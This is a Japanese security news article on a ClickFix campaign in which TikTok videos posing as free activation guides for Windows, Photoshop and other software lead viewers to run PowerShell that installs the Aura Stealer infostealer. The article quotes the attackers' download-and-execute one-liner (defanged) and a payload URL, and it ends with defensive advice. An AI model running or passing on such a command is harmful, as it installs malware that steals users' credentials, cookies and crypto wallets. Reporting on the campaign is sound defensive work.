TikTok動画を悪用した情報窃取マルウェアの拡散が継続
サイバー犯罪者たちは、Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro、Discord Nitroといった人気ソフトウェア、さらにはNetflixやSpotify Premiumといった架空のサービスの無料アクティベーションガイドを装ったTikTok動画を利用し、情報窃取マルウェアを拡散し続けています。このキャンペーンは、以前から確認されており、現在も活発に行われています。
「ClickFix攻撃」の手口
これらの動画は「ClickFix攻撃」と呼ばれるソーシャルエンジニアリング手法を用いています。これは、正規の「修正」や指示に見せかけ、ユーザーを騙して悪意のあるPowerShellコマンドやその他のスクリプトを実行させ、コンピューターをマルウェアに感染させるものです。
各動画では、PowerShellを管理者として実行するよう指示し、以下のような1行のコマンドを表示します。
iex (irm slmgr[.]win/photoshop)
URL内のプログラム名(例: photoshop)は、偽装されているソフトウェアによって異なります(例: Windowsのアクティベーション動画ではwindows)。
マルウェアのダウンロードと実行
このコマンドが実行されると、PowerShellはリモートサイトslmgr[.]winに接続し、別のPowerShellスクリプトを取得・実行します。このスクリプトは、Cloudflare Pagesから2つの実行ファイルをダウンロードします。
最初にダウンロードされる実行ファイル(https://file-epq[.]pages[.]dev/updater.exe)は、Aura Stealerという情報窃取マルウェアの亜種です。Aura Stealerは、ブラウザに保存された認証情報、認証クッキー、仮想通貨ウォレット、その他のアプリケーションからの認証情報などを収集し、攻撃者にアップロードすることで、ユーザーのアカウントへのアクセスを可能にします。
さらに、source.exeという追加のペイロードがダウンロードされます。これは、.NETのVisual C#コンパイラ(csc.exe)を使用してコードを自己コンパイルし、メモリにインジェクトして起動するために使用されます。この追加ペイロードの目的は現時点では不明です。
ユーザーへの警告と対策
これらの手順を実行してしまったユーザーは、すべての認証情報が漏洩したとみなし、直ちにアクセスしたすべてのサイトでパスワードをリセットするべきです。
一般的なルールとして、ウェブサイトからコピーしたテキストを、ファイルエクスプローラーのアドレスバー、コマンドプロンプト、PowerShellプロンプト、macOSターミナル、Linuxシェルなどのオペレーティングシステムのダイアログボックスで実行してはなりません。
ClickFix攻撃は過去1年間で非常に普及しており、ランサムウェアや仮想通貨窃盗キャンペーンで様々なマルウェアを配布するために利用されています。